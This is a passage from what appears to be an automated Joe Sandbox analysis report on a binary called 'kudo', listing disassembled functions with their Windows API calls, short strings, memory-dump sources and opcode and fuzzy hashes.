                                                        • Part of subcall function 0081FC86: _wcscpy.LIBCMT ref: 0081FCA9
                                                        • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                        • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                      • __wcsnicmp.LIBCMT ref: 0086B02D
                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0086B0F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                      • String ID: LPT
                                                      • API String ID: 3222508074-1350329615
                                                      • Opcode ID: 28f2ac2721d855aa5ac0a4d738c4a97fa610c5c9dd1134b553ec102331771779
                                                      • Instruction ID: 7f780b8a7b80032da2afb9e9d35bddc831c95ee9468cd312927ee3dba195aab0
                                                      • Opcode Fuzzy Hash: 28f2ac2721d855aa5ac0a4d738c4a97fa610c5c9dd1134b553ec102331771779
                                                      • Instruction Fuzzy Hash: 65616F75A00219AFCB14DF98C891EAEB7B4FF09314F118069F956EB391E770AE84CB51
                                                      Function 00812957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 00812968
                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00812981
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemorySleepStatus
                                                      • String ID: @
                                                      • API String ID: 2783356886-2766056989
                                                      • Opcode ID: 0b3409f7d06df94921f5a9e3a468e1762cc47491fc4d31d6204eb9fd7e2edad3
                                                      • Instruction ID: a50df8cbf0c3047a26835046827e24f69abeccd18e53b6c358d6f808a79342d2
                                                      • Opcode Fuzzy Hash: 0b3409f7d06df94921f5a9e3a468e1762cc47491fc4d31d6204eb9fd7e2edad3
                                                      • Instruction Fuzzy Hash: 715147714087449BD760AF18DC86BABBBE8FB85340F41885DF2D9811A2DB708568CB67
                                                      Function 00869734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00804F0B: __fread_nolock.LIBCMT ref: 00804F29
                                                      • _wcscmp.LIBCMT ref: 00869824
                                                      • _wcscmp.LIBCMT ref: 00869837
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp$__fread_nolock
                                                      • String ID: FILE
                                                      • API String ID: 4029003684-3121273764
                                                      • Opcode ID: ce3894ff41f91208a5e74e8e1964980804d18b6ef30a443043cf4f700f65f94f
                                                      • Instruction ID: c98faa896b68233360d1e07c34c9aad97f58f66b676087645809b8066644398a
                                                      • Opcode Fuzzy Hash: ce3894ff41f91208a5e74e8e1964980804d18b6ef30a443043cf4f700f65f94f
                                                      • Instruction Fuzzy Hash: 0F41A571A4021ABADF209AA8CC45FEFB7BDFF86714F010479FA04E71C1DA75A9048B61
                                                      Function 0087258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 0087259E
                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008725D4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CrackInternet_memset
                                                      • String ID: |
                                                      • API String ID: 1413715105-2343686810
                                                      • Opcode ID: 7d9d4d52de7472a2d24fe7bb218836a7bff32ff90fd15afc91b44fbe430ce8c3
                                                      • Instruction ID: 7b9c244065f6be4588c5b4eb19cffa68487c27703d9bc79245041aa5c0d7e08c
                                                      • Opcode Fuzzy Hash: 7d9d4d52de7472a2d24fe7bb218836a7bff32ff90fd15afc91b44fbe430ce8c3
                                                      • Instruction Fuzzy Hash: 8E314871C00119ABCF51AFA4CC85EEEBFB8FF18350F10405AF908A6166EB319955CB61
                                                      Function 00886A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(?), ref: 00886B17
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00886B53
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$DestroyMove
                                                      • String ID: static
                                                      • API String ID: 2139405536-2160076837
                                                      • Opcode ID: 03b72fd6812e03c88699c818fd760af661dc009bf24cdbf12e4cb331d51531ab
                                                      • Instruction ID: 6dce899856f08c66bd0bf9743f0faf1c6a0c786d3204d1e20e0503bbc9681094
                                                      • Opcode Fuzzy Hash: 03b72fd6812e03c88699c818fd760af661dc009bf24cdbf12e4cb331d51531ab
                                                      • Instruction Fuzzy Hash: C1318F71200604AEEB10AF68CC81FFB77B9FF88764F108619F9A5D7191EA31AC91C760
                                                      Function 008628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00862911
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0086294C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: be743315e7ec26dd69aceecde3a8f9a2040b5d2d1348d332911388c373cb209b
                                                      • Instruction ID: 945b645b9e53ab4bb5a7af16029f47db0024e0d0a5fa341816d304be5ec18887
                                                      • Opcode Fuzzy Hash: be743315e7ec26dd69aceecde3a8f9a2040b5d2d1348d332911388c373cb209b
                                                      • Instruction Fuzzy Hash: 8C31D531A007099FEB24CF58DC45FAEBFB4FF85350F1900A9E985E61A1DB709984CB51
                                                      Function 008739E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __snwprintf.LIBCMT ref: 00873A66
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __snwprintf_memmove
                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                      • API String ID: 3506404897-2584243854
                                                      • Opcode ID: 2a1d3ccdcae7a34766ba334eebb96490abdc1512de5510f71218a489c72b25bf
                                                      • Instruction ID: c5fbaab827b3009dc0cf43dafc99e417580f5aec6110ac84a21149813f8ccdfe
                                                      • Opcode Fuzzy Hash: 2a1d3ccdcae7a34766ba334eebb96490abdc1512de5510f71218a489c72b25bf
                                                      • Instruction Fuzzy Hash: 0C218471A00529AFCF50EF68CC82AAEB7B9FF44300F404454E559E7285DB34EA45DB66
                                                      Function 008866D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00886761
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0088676C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Combobox
                                                      • API String ID: 3850602802-2096851135
                                                      • Opcode ID: 2af0c6088f5d52e1abc1e7483ae3206f613dc6ce5aebf1507dd96dcbbd82ed58
                                                      • Instruction ID: 15d8b172d727545093224aeeaa99ad41918be228c7e809af0b74abbfab47d176
                                                      • Opcode Fuzzy Hash: 2af0c6088f5d52e1abc1e7483ae3206f613dc6ce5aebf1507dd96dcbbd82ed58
                                                      • Instruction Fuzzy Hash: E3118275200208AFEF21EF58DC81EBB376AFB98368F104229F914D7290E6759C6187A0
                                                      Function 00886C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00801D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00801D73
                                                        • Part of subcall function 00801D35: GetStockObject.GDI32(00000011), ref: 00801D87
                                                        • Part of subcall function 00801D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00801D91
                                                      • GetWindowRect.USER32(00000000,?), ref: 00886C71
                                                      • GetSysColor.USER32(00000012), ref: 00886C8B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                      • String ID: static
                                                      • API String ID: 1983116058-2160076837
                                                      • Opcode ID: b5d995db997e330eabbbf00b8fc4a75482aee9312393d079f7a0c5a190fe698e
                                                      • Instruction ID: 1107178e453b86fc60d311f446bf538c4156e74682ddfbf771987c39d0d6b5ab
                                                      • Opcode Fuzzy Hash: b5d995db997e330eabbbf00b8fc4a75482aee9312393d079f7a0c5a190fe698e
                                                      • Instruction Fuzzy Hash: D7212C72510209AFDF04DFA8CC45EFA7BB9FB08315F004629FE55D2251E635E860DB60
                                                      Function 00886920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 008869A2
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008869B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: LengthMessageSendTextWindow
                                                      • String ID: edit
                                                      • API String ID: 2978978980-2167791130
                                                      • Opcode ID: 2845d51f1e49105b502820653306b5b8e9c7b26da24303d012891e9c357aa8be
                                                      • Instruction ID: 31e41c436ff2208f8e2bf5fb96bbeafddd3375781bd5bd962ca3b7f169b41173
                                                      • Opcode Fuzzy Hash: 2845d51f1e49105b502820653306b5b8e9c7b26da24303d012891e9c357aa8be
                                                      • Instruction Fuzzy Hash: 17116D71110109ABEF10AE789C45AAB3BA9FB05378F604724FAA5D61E0E631DCA19760
                                                      Function 008629AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00862A22
                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00862A41
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: e723ddb1fc5dd561900e81fb6b5a4131e89c9a4d237017242f8d6ccba93dfb15
                                                      • Instruction ID: 46ec6db68fa4a78ea3f3367f1aab674752d3991eca19be30b84611c36ee0e4ab
                                                      • Opcode Fuzzy Hash: e723ddb1fc5dd561900e81fb6b5a4131e89c9a4d237017242f8d6ccba93dfb15
                                                      • Instruction Fuzzy Hash: 5311BE32901928ABCF32DADCD844FEA77B9FB45315F0640A1E995F7290D7B0AD0AC791
                                                      Function 008721D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0087222C
                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00872255
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Internet$OpenOption
                                                      • String ID: <local>
                                                      • API String ID: 942729171-4266983199
                                                      • Opcode ID: 5b73cb5e25a93eb767afe9fa41986ade5b3d8f1bcde30b86554af83c70fd805d
                                                      • Instruction ID: b33e5d08903113da7b63970423af129978f3aa2c42c22ba22095df78d5938e7f
                                                      • Opcode Fuzzy Hash: 5b73cb5e25a93eb767afe9fa41986ade5b3d8f1bcde30b86554af83c70fd805d
                                                      • Instruction Fuzzy Hash: 0011E070511225BADB248F158C84EBBFBA8FF0A355F10C22AFA28C6101D270E990D6F0
                                                      Function 00858E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                        • Part of subcall function 0085AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0085AABC
                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00858E73
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: 53113041d7211fde1b9149a4a0e37368e38c34ddfe708de08ccce92840dbcf4d
                                                      • Instruction ID: e773fe5065edadea0a259f61bbd1b943a1051c5f8fe9bdab1bf94eea36c6ac39
                                                      • Opcode Fuzzy Hash: 53113041d7211fde1b9149a4a0e37368e38c34ddfe708de08ccce92840dbcf4d
                                                      • Instruction Fuzzy Hash: 69019271A01229ABCB15EBA8CC568FE7769FF46320B540A1AFC35E73D1EE35580CC661
                                                      Function 00858CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                        • Part of subcall function 0085AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0085AABC
                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00858D6B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
